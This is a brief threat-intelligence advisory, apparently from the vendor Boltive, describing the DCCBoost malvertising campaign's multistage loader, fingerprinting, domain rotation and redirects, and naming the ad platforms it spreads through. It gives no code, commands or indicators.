Over the past 3-4 weeks, Boltive has detected an increase in DCCBoost-related threat activity across all platforms. Boltive has observed DCCBoost run high-volume but short-term campaigns, typically lasting a few weeks. Threat campaign will load a very simple but deeply integrated loader which loads a second stage. Second stage will then perform various fingerprinting, send telemetry (if criteria met), perform ad-quality-vendor checks, and finally redirect if their targeting criteria is satisfied
Fingerprinting, telemetry (1%/configurable), multistage loader, DGA and frequently rotating loader/payload/redirect domains, multiple delays, event based triggers
Propagation: Creatopy/Adspeed/Bannerwise
ALL